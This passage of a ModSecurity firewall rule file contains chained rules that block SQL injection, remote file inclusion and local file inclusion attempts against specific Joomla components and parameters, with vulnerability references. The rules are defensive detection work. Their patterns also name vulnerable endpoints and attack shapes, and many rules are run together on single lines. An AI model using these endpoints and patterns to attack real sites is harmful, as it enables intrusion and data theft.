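    SecRule ARGS:mosConfig_absolute_path "(?i:^\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-comments-post.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2010660) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-trackback.php Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /components/com_mojo/wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010660,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-trackback.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37179'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:mosConfig_absolute_path "(?i:^\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-trackback.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2010710) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id SELECT FROM SQL Injection Attempt
SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010710,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,36425'"
    SecRule REQUEST_LINE "@contains /index.php?option=com_foobla_suggestions&" "chain"
    SecRule ARGS:idea_id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2010711) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id DELETE FROM SQL Injection Attempt
SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010711,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component 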
idea_id DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,36425'" SecRule REQUEST_LINE "@contains /index.php?option=com_foobla_suggestions&" "chain" SecRule ARGS:idea_id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010712) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010712,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,36425'" SecRule REQUEST_LINE "@contains /index.php?option=com_foobla_suggestions&" "chain" SecRule ARGS:idea_id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010713) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010713,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,36425'" SecRule REQUEST_LINE "@contains /index.php?option=com_foobla_suggestions&" "chain" SecRule 
ARGS:idea_id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010714) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010714,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,36425'" SecRule REQUEST_LINE "@contains /index.php?option=com_foobla_suggestions&" "chain" SecRule ARGS:idea_id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010750) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010750,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.nl/0911-exploits/joomlamg-sql.txt'" SecRule REQUEST_LINE "@contains /index.php?option=com_musicgallery&" "chain" SecRule REQUEST_LINE "@contains &task=itempage" "chain" SecRule ARGS:Id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla 
com_musicgallery Component Id Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010751) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010751,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.nl/0911-exploits/joomlamg-sql.txt'" SecRule REQUEST_LINE "@contains /index.php?option=com_musicgallery&" "chain" SecRule REQUEST_LINE "@contains &task=itempage" "chain" SecRule ARGS:Id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010752) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010752,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.nl/0911-exploits/joomlamg-sql.txt'" SecRule REQUEST_LINE "@contains /index.php?option=com_musicgallery&" "chain" SecRule REQUEST_LINE "@contains &task=itempage" "chain" SecRule ARGS:Id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 
Joomla com_musicgallery Component Id Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010753) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010753,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.nl/0911-exploits/joomlamg-sql.txt'" SecRule REQUEST_LINE "@contains /index.php?option=com_musicgallery&" "chain" SecRule REQUEST_LINE "@contains &task=itempage" "chain" SecRule ARGS:Id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010754) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010754,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.nl/0911-exploits/joomlamg-sql.txt'" SecRule REQUEST_LINE "@contains /index.php?option=com_musicgallery&" "chain" SecRule REQUEST_LINE "@contains &task=itempage" "chain" SecRule ARGS:Id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET 
WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010780) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mediaslide component viewer.php path Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_mediaslide/viewer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010780,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mediaslide component viewer.php path Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37440'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mediaslide component viewer.php path Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010805) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010805,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38022'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_yelp&" "chain" SecRule ARGS:cid "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter SELECT FROM SQL Injection 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010806) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010806,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38022'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_yelp&" "chain" SecRule ARGS:cid "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010807) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010807,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38022'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_yelp&" "chain" SecRule ARGS:cid "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010808) 
SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010808,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38022'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_yelp&" "chain" SecRule ARGS:cid "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010809) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010809,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38022'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_yelp&" "chain" SecRule ARGS:cid "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010833) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt SecRule REQUEST_LINE "@contains 
/components/com_intuit/models/intuit.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010833,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10730'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:approval "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010843) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_avosbilletsy Component id Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010843,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_avosbilletsy Component id Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37576'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_avosbillets&" "chain" SecRule ARGS:id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_avosbilletsy Component id Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010844) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010844,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37576'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_avosbillets&" "chain" SecRule ARGS:id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010845) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010845,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37576'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_avosbillets&" "chain" SecRule ARGS:id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010846) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010846,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37576'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_avosbillets&" "chain" SecRule ARGS:id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010842) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010842,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37576'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_avosbillets&" "chain" SecRule ARGS:id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010848) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla morfeoshow morfeoshow.html.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_morfeoshow/morfeoshow.html.php" 
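"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010848,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla morfeoshow morfeoshow.html.php Remote File Inclusion Attempt',tag:'web-application-attack'"
# Chain 2010848, link 2: the request line must also contain "GET ".
SecRule REQUEST_LINE "@contains GET " "chain"
# Chain 2010848, final link.
# Fix: ARGS:user_id holds only the parameter's value, so the previous pattern,
# which also required a literal "user_id=" prefix, could only match when the
# value itself contained that text; the chain effectively never fired.
# The pattern now tests the start of the value for a URL scheme instead.
# rev is left at 2 here; bump it when this change is merged.
# On a match: audit-log part E is added, tx.msg is set and
# tx.critical_anomaly_score is added to tx.anomaly_score.
SecRule ARGS:user_id "(?i:^\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla morfeoshow morfeoshow.html.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2010853) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter SELECT FROM SQL Injection Attempt
# Four-link chain; every link must match for the rule to fire:
#   1. request line contains "/index.php"
#   2. request line contains "GET "
#   3. request line contains "option=com_job&"
#   4. the id_job parameter matches SELECT ... FROM (case-insensitive)
# The first link carries the phase, the block action and the rule metadata.
# The last link adds audit-log part E, sets tx.msg and raises
# tx.anomaly_score by tx.critical_anomaly_score.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010853,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains option=com_job&" "chain"
SecRule ARGS:id_job "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2010854) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter DELETE FROM SQL Injection Attempt
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010854,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter DELETE FROM SQL Injection 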
Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_job&" "chain" SecRule ARGS:id_job "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010855) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010855,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_job&" "chain" SecRule ARGS:id_job "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010856) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010856,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_job&" "chain" SecRule ARGS:id_job "(?i:INSERT.+INTO)" 
